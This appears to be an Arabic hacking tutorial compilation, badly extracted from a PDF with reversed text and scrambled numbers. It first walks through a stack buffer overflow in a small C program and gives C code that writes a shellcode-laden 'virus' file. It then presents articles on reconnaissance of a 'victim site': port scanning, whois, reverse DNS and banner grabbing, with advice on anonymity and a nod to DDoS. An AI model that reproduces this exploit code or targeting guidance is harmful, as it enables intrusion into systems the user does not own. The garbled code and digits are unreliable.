‫;]‪TCHAR buf[10‬‬ ‫‪hfile=CreateFile ("info.txt",GENERIC_READ,FILE_SHARE_READ|FILE_SHARE_WRITE,‬‬ ‫;)‪ (LPSECURITY_ATTRIBUTES )NULL,OPEN_EXISTING,0,NULL‬‬ ‫)‪if(hfile==(HANDLE)­1‬‬ ‫{‬ ‫;)‪MessageBox (mhWnd,"ER: CreateFile ","Error 01",MB_OK‬‬ ‫;‪return 1‬‬ ‫}‬ ‫;)‪ZeroMemory(buf,10‬‬ ‫‪ReadFile (hfile,(LPVOID)buf,‬‬ ‫‪ (DWORD)GetFileSize (hfile,NULL),&nbt,‬‬ ‫;)‪ (LPOVERLAPPED )NULL‬‬ ‫;)‪SendMessage (mEdit,WM_SETTEXT ,0,(LPARAM)(LPCTSTR)buf‬‬ ‫‪ 451‬‬ ‫‪;0 return‬‬ ‫}‬ ‫ستلحظ في الكود المتغیر أو المصفوفة ‪ buf‬حجمھا ‪ 01‬أحرف‪ ‬‬ ‫يقوم البرنامج بقرائة الملف النصي وتخزين محتواة في المتغیر ‪ buf‬بعد ذلك‪ ‬‬ ‫ينقل إلى الداة النصیة ‪ ,‬ماذا لو كان محتوى الملف النصي أكبر من ‪ 01‬أحرف‪ ‬‬ ‫بالتأكید سیحدث خطأ ‪ ,,‬سنقوم بالبحث والنبش داخل ھذا الخطأ‪ ‬‬ ‫إفتح الملف النصي وقم بكتابة أي نص أكبر من ‪ 01‬أحرف ‪ ,‬ولكن لتطبیق الدرس‪ ‬‬ ‫من حیث تشابة العناوين والمحتوى يفضل كتابة النص التالي‪ :‬‬ ‫‪fffdsdddertttttttttyyyyyyyyyyyyyyyyuuuuuuuuuuuuuuu uuuiiiiiiiiiiiiiiiiiiiiiiioooo‬‬ ‫‪oooooooooooooooopppppppppppppp‬‬ ‫بعد أن تكتب النص في الملف ‪ info.txt‬شغل البرنامج بواسطة ‪ olly‬لمراقبتة‪ ‬‬ ‫ضع نقطة توقف عن العنوان ‪0 x004013E 0‬يمثل بداية الدالة ‪ Rfile‬دالة قرائة‪ ‬‬ ‫النص‪,‬وعرضة‪ ‬‬ ‫بعد أن تضع نقطة التوقف شغل البرنامج ونفذ ‪ Read File‬يتوقف التنفیذ عن‪ ‬‬ ‫نقطة التوقف‪ ‬‬ ‫وتمثل بداية الدالة ‪ Rfile‬في الكود المصدري ‪ ,,,,‬لحظ الصورة (خاصة قسم‪ ‬‬ ‫المكدس‪ ‬‬ ‫‪ 254‬‬ ‫سجل العنوان الذي سیخزن بة عنوان العودة وسیر التنفیذ ‪ ,‬بعد ذلك نفذ‪ ‬‬ ‫البرنامج‪ ‬‬ ‫خطوة ‪ ,‬خطوة بإستخدام ‪8 F‬إلى أن تصل إلى نقطة الخطأ وھي الدالة‪readfile‬‬ ‫وبعد تنفیذھا ل حظ التغیرات‪ ‬‬ ‫‪ 354‬‬ ‫ھنا الورطة ‪ ,‬أكید إكتشفتھا ؟؟!‪ ‬‬ ‫ماذا لو غیرنا في الملف النصي الحرف ‪ 31‬و ‪ 41‬و ‪ 51‬و ‪ 61‬وھي"‪ "tttt‬‬ ‫تمثل ھ ذة الحرف عنوان العودة سیستخدمھا المعالج لستمرار ونقل التنفیذ ‪,‬‬ ‫غیر ھذا العنوان‪ ‬‬ ‫إلى عنوان آخر بداخل الملف النصي ‪,‬ھ ذا العنوان يمثل كود لبرنامج‪ ‬‬ ‫مث ً؟؟؟!!!!!!!!!!!!!‪ ‬‬ ‫ل‪ ‬‬ ‫لحظ كیف سنغیر العنوان ‪ +‬سنقوم بكتابة كود تنفیذي بداخل الملف النصي‪ ‬‬ ‫بھذة الطريقة‪ :‬‬ ‫‪ 454‬‬ ‫بعد أن تغیر في العنواين ‪ ,‬وتكتب الكود بداخل محتوى الملف النصي ‪ ,‬تابع ‪ 8F‬‬ ‫إلى أن تصل إلى تعلیمة العودة في نھاية الدالة وھي ‪ RETN‬وبعد ذلك سینقل‬ ‫المعالج‪ ‬‬


‫التنفیذ إلى العنوان الذي قمت بتحديدة وكتبت بة الكود التنفیذي‪ ‬‬ ‫‪ 554‬‬ ‫وبعد ذلك تتبع البرنامج ‪ 8 F‬ولحظ كیف سینفذ برنامجنا الكود الموجود بداخل‬ ‫الملف النصي‪ ‬‬ ‫‪ 654‬‬ ‫وسینتقل لة التنفیذ ‪ ,‬وبھ ذا نكون قد نقلنا التنفیذ دون التغییر في كود البرنامج‬ ‫الصلي‪ ‬‬ ‫وكل التغیرات والضافات التي رأيناھا كانت بداخل الملف النصي‪ ‬‬ ‫ولننا إستطعنا التغییر في سیر التنفیذ دون التغییر في كود البرنامج ‪ ,‬نكون قد‬ ‫إكتشفنا ثغرة‪ ‬‬ ‫في البرنامج وسببھا خطأ في الكود وھ و عدم تحديد حجم القرائة للمتغیر ‪buf‬‬ ‫وبعد أن نكتشف الثغرة ‪ ,‬نقوم بكتابة ‪ ShellCode‬خاص بالثغرة وھو شبیة‪ ‬‬ ‫‪ 754‬‬ ‫بالكراك بعد كسر البرامج‪ ‬‬ ‫ولكن ‪ shellcode‬عبارة عن أرقام ثنائیة ‪ 1‬و ‪ 0‬وللتسھیل تكتب بالھكس‪ ‬‬ ‫ھذة الرقام تكتب بداخل أي لغة برمجة مث ً ثغرات النظمة تكتب ‪ shellcode‬‬ ‫ل‪ ‬‬ ‫بواسطة لغة السي‪ ‬‬ ‫ثغرات خوادم المواقع والسكربتات تكتب بلغة بیرل أو ‪ php‬أو ‪ asp‬أو ‪ html‬‬ ‫المھم أن يكون ‪ shellcode‬عبارة عن أرقام بداخل ھذة اللغات ھذة الرقام تمثل‪ ‬‬ ‫كود بلغة السمبلي يمرر إلى الثغرة لیتم تنفیذة‪ ‬‬ ‫والن سنكتب برنامج بلغة السي ينتج لنا ملف نصي ‪ info.txt‬ھذا الملف‪ ‬‬ ‫النصي مختلف‪ ‬‬ ‫عن أي ملف نصي آخر ‪ ,‬لنة سیحتوي على عناوين النتقال لسیر وتنفیذ‪ ‬‬ ‫البرنامج‪ ‬‬ ‫بالضافة إلى أنة سیحتوي على كود تنفیذي ( عبارة عن إظھار مسج(‪ ‬‬ ‫وفقط بمجرد توزيع ھذا الملف النصي على أي جھاز يحتوي على برنامجنا‪ ‬‬ ‫وبمجرد قرائة الملف‪ ‬‬ ‫النصي نكون قد نفذنا أي كود أوبرنامج في الجھاز الخر‪ ‬‬ ‫ھذا ھو الكود‪ + shellcode‬‬ ‫‪>#include <stdio.h‬‬ ‫‪= ][char shellcode‬‬ ‫‪"09"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x‬‬ ‫‪"00"\xA4\xFB\x12\x‬‬ ‫‪"09"\x90\x90\x90\x90\x90\x90\x90\x‬‬ ‫‪"86"\x6A\x00\x68\x00\x00\x00\x00\x‬‬ ‫‪"0"\xC4\xFB\x12\x00\x50\xFF\x15\xA‬‬ ‫‪"09"\x40\x40\x00\x90\x90\x90\x90\x‬‬ ‫‪ 854‬‬ ‫"‪"\x90\x90\x90\x90\x90\x90\x90\x90‬‬ ‫"‪"XxXx Virus.exe is loading.....‬‬ ‫;"‪"\x00\x00\x90\x90\x90\x90‬‬ ‫)(‪int main‬‬ ‫{‬ ‫;‪FILE* hfile=NULL‬‬ ‫;‪int nb‬‬ ‫{‪if (!(hfile=fopen ("info.txt","w+b"))) ‬‬ ‫;)")(‪printf("Error: fopen‬‬ ‫;‪return 0‬‬ ‫}‬


‫‪nb=fwrite(shellcode,sizeof(char),‬‬ ‫;)‪ sizeof(shellcode),hfile‬‬ ‫;)‪fclose(hfile‬‬ ‫;)"‪printf(" ­­ OKKKKKKKKKK ­­\n‬‬ ‫;)‪printf(" ­|­ Write %d byte ­|­ \n",nb‬‬ ‫;)"‪printf("­­ Create info.txt Virus ­­\n‬‬ ‫;‪return 1‬‬ ‫}‬ ‫ملحظة ‪ :‬ھل تشاھد طريقة ترتیب الكود ‪ -‬ھذة الطريقة متبعة في كل‪ ‬‬ ‫برامج إستغلل الثغرات ‪ ,,‬وأي كود تراة بھذة الطريقة يعتبر‪ shellcode ‬لثغرة‪ ‬‬ ‫المھم‪ :‬‬ ‫نفذ البرنامج لینتج لك ملف نصي ‪ ,‬ضعة في مجلد البرنامج‪ ‬‬ ‫وقم بتنفیذ الدالة‪ Rfile ‬لتلحظ النتیجة‪ ‬‬ ‫وھ ي‪ :‬تشغیل الكود أو البرنامج الموجود في الملف النصي‪ ‬‬ ‫وبھ ذا نكون قد أخذنا كل أقسام الثغرة ‪ ,‬وھي‪ ‬‬ ‫‪ 459‬‬ ‫البحث عن خطأ بداخل أي ملف تنفیذي‪ ‬‬ ‫محاولة إيجاد طريقة لنقل أو تغییر مسار التنفیذ في مرحلة الخطأ‪ ‬‬ ‫كتابة ‪ shellcode‬أو كتابة كود لستغلل والستفادة من الثغرة‪ ‬‬ ‫­‪ ‬‬ ‫وبعد ھذة المقدمة المھمة جد ً ‪ ,‬سنأخذ في الدرس القادم(ضمن سلسلة‬ ‫ا‪ ‬‬ ‫الدروس)‪ ‬‬ ‫مثال متقدم لطريقة إكتشاف ثغرة وتطبیقھا في نظام وندوز‪ ‬‬ ‫بالضافة إلى طريقة عمل أشھر الفايروسات وكیفیة إستغلل الثغرات‪ ‬‬ ‫ودخولھا إلى أي جھ از فقط بمجرد التصال بالنترنت‪ ‬‬ ‫‪ 064‬‬ ‫دراسة موقع الضحیة‪ ‬‬ ‫للكاتب‪ :‬محمد قطان‪ ‬‬ ‫أساسیات الختراق‪ ‬‬ ‫بداية أنا أكتب ھذا المقال وأفترض أن لدى القارئ معلومات بدرجة وسط حول‪ ‬‬ ‫ھذا الموضوع ‪ .....‬‬ ‫لبد من الشارة إلى أن الھ كرز المحترفین يعتمدون في اختراقھم للمواقع على‪ ‬‬ ‫نظام ‪ Linux‬وذلك لسباب منھا أنه ھو الكثر انتشارا لدى الشركات‪ ‬‬ ‫المستضیفة للمواقع ‪ ,‬وكذلك لتوفر أدوات اختراق قوية تعمل على ھذا النظام‪ ‬‬ ‫خلفا لبقیة النظمة الخرى ‪ .‬إل أن مطوري مثل ھذه الدوات لم يغفلوا أنظمة‪ ‬‬ ‫تشغیل مايكروسوفت وذلك لشیوعھا ‪ ,‬ومع ذلك تبقى ھناك بعض الفوارق‪ ‬‬ ‫تجعل الختراق عبر لینكس ربما أفضل من غیره ‪ ,‬وسأركز في شرحي ھنا‪ ‬‬ ‫على الختراق عبر نظام ويندوز لوجود أدوات تؤدي المھمة بدرجة ل بأس بھا ‪ .‬‬ ‫اختراق المواقع يتم عادة من خلل الثغرات ( ‪ ( Exploites‬التي توصلنا إلى‪ ‬‬ ‫الغاية وھو ملف إلباس وورد ‪ Pwl‬للموقع ‪ ,‬وھذه الثغرات منھا ما يكون في نظام‪ ‬‬ ‫تشغیل السیر فر المستضیف للموقع الضحیة ‪ ,‬وقد تكون في الملقم أو التقنیة‪ ‬‬ ‫المستخدمة في بناء الموقع وغالبا ما تكون ‪ CGI‬أو ‪ ... PHP‬‬ ‫وعملیة اختراق موقع ما تتطلب دقة متناھیة ودراسة عمیقة لھذا الموقع لن‪ ‬‬ ‫الوصول إلى ‪ Root‬الموقع ( إن صح التعبیر ) وتغیر ال ‪ Home Page‬لیس أمرا‪ ‬‬ ‫سھل كما يتصوره البعض وھ ذا يختلف باختلف سیر فر الموقع وأنظمة المان‪ ‬‬ ‫التي يستخدمھ ا مما يجعل اختراق موقع ما مستحیل أو صعبا أو سھل نوعا ما ‪.‬‬ ‫المرحلة الولى ‪ :‬دراسة الموقع الضحیة ‪ :‬‬ ‫ھذه المرحلة أساسیة وھ امة ويجب أن تتم بدقة ودراسة عمیقة‪ ‬‬ ‫وتشمل الدراسة عدة أمور ‪ :‬‬


‫معرفة المنافذ المفتوحة في الموقع ‪ .‬‬ ‫الكشف عن النظام الذي يعمل علیه السیر فر المستضیف للموقع ‪ .‬‬ ‫معرفة نوع الملقم للموقع ‪ .‬‬ ‫‪ 164‬‬ ‫دراسة بنیة الموقع البرمجیة ‪ . CGI ­ PHP ­ Perl ....‬‬ ‫وھ ناك أمور أخرى مثل مدى الخسائر المادية الناتجة عن اختراق الموقع ‪ ,‬‬ ‫والنسبة المئوية لزائري الموقع والوقات التي ينشط فیھا الموقع من حیث عدد‬ ‫الزائرين وأوقات الخمول ‪ .........‬‬ ‫الدوات المتاحة لذلك ‪ :‬‬ ‫ھناك طرق كثیرة لجمع مثل ھذه المعلومات ‪ ...‬ولكنني سأختصر الطريق‪ ‬‬ ‫ونتحدث عن القوى مباشرة ‪ .‬‬ ‫البرامج ‪ :‬‬ ‫منھ ا يعمل على بیئة الويندوز مثل ‪ Super Scan :‬و ‪ Win Scan‬و ‪ Port Scaner‬‬ ‫وكذلك أحد البرامج التي تعمل‪ ....... Whois‬وھي برامج تعطي معلومات غالبا‪ ‬‬ ‫ما تكون جیدة ‪ .‬‬ ‫بالنسبة لنظام ‪ Linux‬فیمكن استعمال ‪ Nmap‬وھي معرفة وقوية ومفضلة لدى‬ ‫كثیر من الھكرز ‪ ,‬كما أنھا توفر مسح للبورتات ‪ TCP‬و ‪ ........... UDP‬‬ ‫وھناك أيضا مواقع تقدم مثل ھذه الخدمة وأقواھا على الطلق ‪ :‬‬ ‫‪ /http://www.netcraft.com‬‬ ‫وھناك أيضا موقع ‪ :‬‬ ‫‪ /http://www.dns411.com‬‬ ‫وھ ناك طريقة قديمة معروفة لدى الكثیرين وھي إرسال ايمیل إلى عنوان غیر‪ ‬‬ ‫موجود في الموقع لیأتیك الرد على ايمیلك بأن العنوان الذي قصدته غیر مطلوب‬ ‫وتحتوي الرسالة على معلومات عن نظام التشغیل ‪ ....‬‬ ‫ولكن ھ ذه الثغرة أصبحت قديمة ول تعمل إل مع مواقع قديمة جدا ‪ ...‬‬ ‫والطريقة المضلة ھ ي عن طريق التشبیك مع الموقع باستخدام ال ‪ Telnet‬مثل‬ ‫‪ :‬‬ ‫‪ /http://www.xxxx.com telnet‬‬ ‫أو باستخدام ‪ IP‬الموقع بدل عن اسمه ‪ ,‬ويتم الدخول ھنا باستخدام أحد‪ ‬‬ ‫المنافذ المفتوحة في الموقع ومنا على سبیل المثال ‪ :‬‬ ‫‪ 12‬ويستخدم لبروتوكول ال ‪ ... FTP‬‬ ‫‪ 264‬‬ ‫‪ 32‬ويستخدم لخدمة ال ‪ Telnet‬في الموقع ‪ ....‬‬ ‫‪ 52‬خدمة برتوكول الرسال ‪ Stmp‬ليمیل من نوع ‪ ......... POP‬‬ ‫‪ 011‬خدمة بروتوكول الستقبال وھو ‪ .......... POP‬‬ ‫وعن طريق ھ ذين الخیرين يتم تدمیر خدمة البريد في الموقع ولھذا حديث آخر‪ ‬‬ ‫‪ ........‬‬ ‫ويمكنك استخدام بعض أوامر ال ‪ Telnet‬ھنا مثل ك‪ ‬‬ ‫أمر ‪ List‬ويستخدم لعرض محتويات السیر فر وما يحويه من برامج وملفات (‪ ‬‬ ‫يمكنك من خللھ ا مثل معرفة نظام التشغیل ) تحتاج الى بعض الخبرة ھنا‪ ‬‬ ‫‪ .......‬‬ ‫طبعا ھ نا يجب أن تستخدم خاصیة ‪ Anonymous‬وذلك لخفاء ھويتك ‪ ....‬ورقم‪ ‬‬ ‫ال ‪ ........ IP‬‬ ‫لنفترض أنك حصلت على النتائج التالیة ‪ :‬‬ ‫نظام التشغیل ھو ‪ Linux 4‬‬ ‫والملقم ھو ‪ Apache 3,1‬‬ ‫والبنیة البرمجیة المستخدمة في بناء الموقع ھي مثل ‪ CGI‬أو ‪ ........ PHP‬‬ ‫نحفظ ھ ذه النتائج في ورقة عمل خاصة لننتقل إلى الخطوة التالیة الھم وھي‪ ‬‬ ‫‪ :‬الكشف عن الثغرات الموجودة في نظام التشغیل أو الملقم أو في البنیة‪ ‬‬ ‫البرمجیة ‪ .......‬‬


‫ولھ ذا درس أخر أقوم حالیا بتحضیره وسأضعه قريبا ‪ ......‬‬ ‫المھم أن ھذه النتائج التي حصلنا علیھ ا تحتاج إلى جلسة عمل كاملة تختلف‪ ‬‬ ‫مدتھ ا باختلف مدى خبرة المخترق ومدى معرفته بھ ذه الدوات ‪ ,‬ولكن لبد أن‪ ‬‬ ‫تتم جمع ھذه المعلومات كما قلت بدقة متناھ یة ومن خلل تجريب أكثر من أداة‬ ‫وأكثر من محاولة واحدة وذلك للتأكد من دقة المعلومات والنتقال إلى المرحلة‪ ‬‬ ‫التالیة بأمان ‪ ....‬‬ ‫ملحقات البحث ‪ :‬‬ ‫أول ‪ :‬المواقع التي تقدم خدمة التصفح الخفي منھا ‪ :‬‬ ‫‪ /http://www.anonymizer.com‬‬ ‫‪ https://www.ziplip.com/ps/ZLPlus/home.jsp‬‬ ‫‪ 364‬‬ ‫ثانیا ‪ :‬مواقع تحوي الدوات التي ذكرتھا وھ ي مواقع رائعة جدا ‪ :‬‬ ‫‪ http://packetstormsecurity.org/wingate­scanner/indexsize.shtml‬‬ ‫‪ http://www.textolandia.org.ar/txt/newbie.htm‬‬ ‫وختاما أعتقد أنني قدمت معلومات سھ لة ومبسطة قلما تجد مثل ھذا الوضوح‬ ‫في كثیر من مواقع الھ كر ‪ ,‬ول تحتاج المر منك إل إلى التجربة والمحاولة‪ ‬‬ ‫لكتساب الخبرة ‪ ........‬‬ ‫‪ 464‬‬ ‫اتخلص اكبر قدر ممكن من المعلومات عن الموقع من خلل‪ ‬‬ ‫الدومین‪ ‬‬ ‫للكاتب‪ befcake:‬‬ ‫طبعا انا بحاول اشرح بصوره مبسطه كیفیه عمل‪ whois ‬للدومین‪ ‬‬ ‫وعده طرق خفیفه لكن فعاله في معرفه شركه الستضافه او صاحب الدومین‪ ‬‬ ‫اول شي نبدأ فیه ال‪ DOMAIN WHOIS‬‬ ‫طبعا كلنا نعرف ان لكل دومین صاحب و معلومات‪ ‬‬ ‫طبعا انا ما ابي احط لك وصلت و تحمیل ف باخذ موقع يوفر ھالخدمه اونلين‪ ‬‬ ‫‪ http://www.geektools.com/whois.php‬‬ ‫طبعا بتحط الموقع و الرقم الي راح يظھر بالصوره "ھذا اجراء علشان يمنع‪ ‬‬ ‫البحث الوتماتیكي حمايه لترافیك الموقع مال ال"‪ WHOIS‬‬ ‫وفي موقع ثاني ال و ھو‪ ‬‬ ‫‪ http://registrar.verisign­grs.com/whois/‬‬ ‫افضل و ادق من ناحیه النتائج‪ ‬‬ ‫على العموم نكمل و نحط الدومین مثل‪ s4a.cc ‬راح يطلع لنا التالي‪ ‬‬ ‫كود‪ :‬‬ ‫‪Whois Server Version 1.0‬‬ ‫‪Domain names can now be registered with many different competing registrars.‬‬ ‫‪Go to http://registrar.verisign­grs.com/whois/ for detailed information.‬‬ ‫‪ Domain Name: S4A.CC‬‬ ‫‪ Registrar: ENOM, INC.‬‬ ‫‪ Whois Server: whois.enom.com‬‬ ‫‪ Referral URL: http://www.enom.com‬‬ ‫‪ Name Server: NS5.ARASERV.COM‬‬ ‫‪ Name Server: NS11.ARASERV.COM‬‬ ‫‪ Name Server: NS6.ARASERV.COM‬‬ ‫‪ Name Server: NS10.ARASERV.COM‬‬ ‫‪ Status: CLIENT­XFER­PROHIBITED‬‬ ‫‪ Status: CLIENT­DELETE­PROHIBITED‬‬ ‫‪ Updated Date: 16­dec­2004‬‬ ‫‪ Creation Date: 07­nov­2004‬‬ ‫‪ Expiration Date: 07­nov­2005‬‬


‫‪ 465‬‬ ‫طبعا من الكلم الي سبق قدرنا نعرف شغلت مھمه ال و ھي‪ ‬‬ ‫شركه الستضافه و ھي ‪ http://www.araserv.com /‬‬ ‫و ال" ‪ name servers‬في حاله لو كنت ناوي تسوي ‪ DDOS‬ممكن ھالمعلومه‪ ‬‬ ‫تفیدك"‪ ‬‬ ‫وتاريخ انتھ اء الدومین لو كنت ناوي تاخذ الدومین بعد ما ينتھي‪ .‬‬ ‫كما في طريقه اخرى بسیطه وفعاله في نفس الوقت لمعرفه شركه‪ ‬‬ ‫الستضافه‪ ‬‬ ‫و ھي ال‪ reverse dns‬‬ ‫بوريكم مثال بسیط‪ ‬‬ ‫كود‪ :‬‬ ‫‪* Dns resolving kawaser.net‬‬ ‫­‬ ‫‪* 05.271.44.702 Dns resolved kawaser.net to‬‬ ‫­‬ ‫‪* 05.271.44.702 Dns resolving‬‬ ‫­‬ ‫‪* Dns resolved 207.44.172.50 to ev1s­207­44­172­50.ev1servers.net‬‬ ‫طبعا مثل ما انتوا شايفین شركه الستضافه راح تكون ‪ ev1servers.net‬‬ ‫وفیه طريقه بعد حلوه و سريعه‪ ‬‬ ‫ال و ھي التصال على بورت ‪ 341‬‬ ‫خلونا نجرب على موقعنا‪ s4a.cc‬‬ ‫كود‪ :‬‬ ‫‪* OK [CAPABILITY IMAP4REV1 LOGIN­REFERRALS AUTH=LOGIN] ara2.araserv.com‬‬ ‫‪)IMAP4rev1 2003.339­cpanel at Sun, 13 Mar 2005 15:02:11 +0300 (AST‬‬ ‫طبعا باين واضح انه سرفر الموقع ‪ ara2.araserv.com‬‬ ‫وشركه الستضافه ‪ araserv.com‬‬ ‫اتمنى اني اكون افدتكم بالمعلومات الخفیفه ھذي‪ ‬‬ ‫‪ 664‬‬ ‫‪ Remote OS Detection‬‬ ‫للكاتب‪ Broken Arrow:‬‬ ‫ھذا الموضوع من أھ م المواضیع في عالم الختراق‪ .‬لن المخترق غالبا ما‪ ‬‬ ‫يبدأ في البحث عن أكبر كمیة من المعلومات عن ھدفه‪ .‬سواء كان يستھدف‪ ‬‬ ‫أحد المواقع أو المزودات‪ ,‬أو حتى شبكة كاملة‪ .‬و أول ما يبدأ المخترق في‪ ‬‬ ‫البحث عنه ھو نظام التشغیل للھدف‪.‬ھذا المقال ھو عباره عن مجموعة من‪ ‬‬ ‫النقاط و رؤوس القلم ل أكثر‪ .‬لنه موضوع شديد التشعب‪ .‬و يعتمد على الكثیر‬ ‫من التقنیات المعقدة‪ ,‬على القل بالنسبة لي ‪ .):‬‬ ‫لكي نتمكن من الستمرار معً حتى نھايه ھذا المقال‪ .‬من المفترض ان‪ ‬‬ ‫ا‪ ‬‬ ‫تملك نظام تشغیل ‪ Linux‬أو ‪ .Unix‬ل أعلم أن كانت الـ ‪ shell account‬سوف‪ ‬‬ ‫تكون مناسبة لبعض الوامر التي سوف ننفذھا خلل الموضوع‪ .‬كما ينبغي ان‪ ‬‬ ‫تكون لديك معرفه‪ ,‬و لو بسیطة ببروتوكول ‪ . TCP/IP‬‬ ‫سوف أبدأ بمناقشة بعض الطرق التقلیدية و القديمه نوع ً ما‪ .‬أولى ھذه‪ ‬‬ ‫ا‪ ‬‬ ‫الطرق‪ ,‬ھي أرسال ‪ E­mail‬بأسم مغلوط إلى النظام المستقبل‪ ,‬الذي سوف‪ ‬‬ ‫يقوم ملقم البريد الخاص به بالرد برسالة تفید بأن من أرسلت له رسالتك غیر‪ ‬‬ ‫موجود‪ .‬عند عرض الـ‪ Headers‬الخاصه بالرسالة سوف تجد معلومات خاصه‪ ‬‬ ‫بالھ دف‪ ,‬و نظام التشغیل الخاص به‪ .‬في الحقیقة‪ ,‬انا لم أجرب ھذه الطريقة من‬ ‫قبل‪ .‬ربما لنني قرأت عنھا في ملفات تفوقوني عمًر ‪ .):‬المھم انھا من أقدم و‪ ‬‬ ‫ا‪ ‬‬


‫أشھر الطرق في ھذا المجال‪ .‬‬ ‫‪ Banner Grabbing‬‬ ‫ب قات ً في الكثیر من‪ ‬‬ ‫الطريقة الخرى ھي الـ‪ .Banners‬و ھ ذه تعتبر عی ً‬ ‫ا ل‪ ‬‬ ‫النظمة و التطبیقات‪ .‬حیث أنك تستطیع بمجرد التصال بالخدمة‪ ,‬تستطیع‪ ‬‬ ‫الحصول على أسم البرنامج العامل على المنفذ‪ ,‬و ربما أكثر من ذلك‪ .‬حیث‪ ‬‬ ‫‪ 764‬‬ ‫يمكنك الحصول على نوع و أصدار نظام التشغیل‪ .‬و المشكلة أن الكثیر من‪ ‬‬ ‫مدراء النظمة ل يھ تمون بأغلق‪ ,‬أو على القل تزيیف ھذه البانارات‪ .‬و سوف‪ ‬‬ ‫نناقش الن بعض الوسائل الخاصه بالحصول على مثل ھذه المعلومات‪ ....‬‬ ‫ی‪ ,‬لتحديد الخدمة العاملة على أي منفذ‪ .‬كل ما علینا القیام به ھو ا‪ ‬‬ ‫مبدئ َ‬ ‫ب ما نجد الكثیر من‪ ‬‬ ‫وغال‬ ‫عادي‪.‬‬ ‫‪Telnet client‬‬ ‫أي‬ ‫طريق‬ ‫عن‬ ‫المنفذ‬ ‫ذا‬ ‫ھ‬ ‫ب‬ ‫التصال‬ ‫ً‬ ‫ا‪ ‬‬ ‫المعلومات القیمة بھ ذه الطريقة‪ .‬سوف نقوم ببعض التجارب و نرى نتائجھا‪ ...‬‬ ‫‪1.0.0.721 [root@localhost root]# telnet‬‬ ‫‪...1.0.0.721 Trying‬‬ ‫‪.1.0.0.721 Connected to‬‬ ‫‪.']^' Escape character is‬‬ ‫‪)Red Hat Linux release 7.2 (Enigma‬‬ ‫‪686Kernel 2.4.5 on an i‬‬ ‫‪:login‬‬ ‫نلحظ ھنا أننا قمنا بالتصال بالمنفذ رقم ‪ 32‬الذي يخدم الـ ‪ . Telnet‬و‪ ‬‬ ‫ض أنني "أتفضحت" ‪ .):‬الخدمة عرضت نظام التشغیل و أصداره و و ا‪ ‬‬ ‫نلحظ أي ً‬ ‫نوعه و أصدار الـ‪ Kernel‬و الـ ‪ .Architecture‬أي أنني أعلنت كل المعلومات‪ ‬‬ ‫الدقیقة التي يحتاجھ ا من يخطط لختراق جھازي‪ .‬‬ ‫ض‪ ,‬منفذ الـ‪ , FTP‬حیث تقوم الخدمة‪ ‬‬ ‫من المنافذ التي يمكن التصال بھا أي ً‬ ‫ا‪ ‬‬ ‫بتقديم بعض المعلومات عند التصال بھذا المنفذ‪ ...‬‬ ‫‪12 1.0.0.721 [root@localhost root]# telnet‬‬ ‫‪...1.0.0.721 Trying‬‬ ‫‪.1.0.0.721 Connected to‬‬ ‫‪.']^' Escape character is‬‬ ‫‪.220 localhost.localdomain FTP server (Version wu­2.6.1­18) ready‬‬ ‫‪user broken‬‬ ‫‪.331 Password required for broken‬‬ ‫‪************* pass‬‬ ‫‪.230 User broken logged in‬‬ ‫‪syst‬‬ ‫‪8215 UNIX Type: L‬‬ ‫‪quit‬‬ ‫‪.221­You have transferred 0 bytes in 0 files‬‬ ‫‪.221­Total traffic for this session was 421 bytes in 0 transfers‬‬ ‫‪.221 Thank you for using the FTP service on localhost.localdomain‬‬ ‫‪.Connection closed by foreign host‬‬ ‫‪#][root@localhost root‬‬ ‫‪ 864‬‬ ‫نلحظ ھ نا أنني قمت بالتصال بمنفذ خدمة الـ‪ . FTP‬بمجرد أتمام التصال‪ ,‬‬ ‫قام الخادم بإخباري عن نوع برنامج الخادم و أصداره بالتفصیل‪ .‬و عند تسجیل‪ ‬‬ ‫الدخول‪ ,‬قمت بتنفیذ المر ‪ SYST‬الذي يمنحني المزيد من المعلومات عن نظام‪ ‬‬ ‫التشغیل و الخادم‪ .‬ينبغي أن نقول‪ ,‬أن ھ ذا المر يعتمد على الخادم و أعداداته‪ .‬‬


‫حیث أنه من الممكن في بعض الحالت تنفیذ ھذا المر قبل عملیة الـ‪ . Login‬و‪ ‬‬ ‫ض عند‪ ‬‬ ‫في أحیان أخرى يتم أيقاف ھ ذا المر تما ً‬ ‫م عن العمل‪ .‬من الممكن أي ً‬ ‫ا‪ ‬‬ ‫ا‬ ‫تسجیل الدخول إلى الخادم‪ ,‬حتى و لو كان ذلك بحساب الـ‪ , anonymous‬‬ ‫الحصول على أحدى ملفات الـ ‪ Binary‬التنفیذية ‪ ,‬مثل ‪ /bin/ls‬و أستخراج‪ ‬‬ ‫المزيد من المعلومات عن نظام التشغیل و بنیته‪ .‬‬ ‫الخدمة التالیة التي سوف نقوم بدراستھا ھي ‪ HTTP‬على المنفذ ‪ 08‬أو‪ ‬‬ ‫‪ . 0808‬أذا كان الھدف من عملیة تحديد نظام التشغیل ھو عبارة عن ‪ Web‬‬ ‫‪ Server‬فإنك بالتأكید سوف تجد ھ ذه الخدمة مفعلة‪ .‬تكمن اھمیة ھذه الخدمة‪,‬‬ ‫في انھ ا تمكننا من الحصول على كمیة أكبر من المعلومات عن ھدفنا‪ .‬سوف‪ ‬‬ ‫نجرب الحصول على المعلومات من ھذه الخدمة‪ ...‬‬ ‫سوف نقوم بلتصال بھذا المنفذ بواسطة الـ ‪ Telnet‬و لن ِ ما سیحدث‪ ....‬‬ ‫ر‪ ‬‬ ‫‪08 1.0.0.721 [root@localhost root]# telnet‬‬ ‫‪...1.0.0.721 Trying‬‬ ‫‪.1.0.0.721 Connected to‬‬ ‫‪.']^' Escape character is‬‬ ‫‪1.1/GET /qwe HTTP‬‬ ‫‪HTTP/1.1 400 Bad Request‬‬ ‫‪Date: Sat, 05 Oct 2002 18:06:38 GMT‬‬ ‫‪2.0.1/Server: Apache/1.3.20 (Unix) (Red­Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b DAV‬‬ ‫‪10_42.1/PHP/4.0.6 mod_perl‬‬ ‫‪Connection: close‬‬ ‫‪Transfer­Encoding: chunked‬‬ ‫‪1­9588­Content­Type: text/html; charset=iso‬‬ ‫‪XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX‬‬ ‫‪.Connection closed by foreign host‬‬ ‫لقد قمت بحذف الـ‪ HTML code‬الناتج لتقلیل الحجم‪ ,‬ل اكثر‪ .‬لقد قمنا ھنا‪ ‬‬ ‫بالتصال بالمنفذ رقم ‪ , 08‬و قمنا بتنفیذ طلب ‪ GET‬غیر صالح‪ ,‬فكانت المخرجات‪ ‬‬ 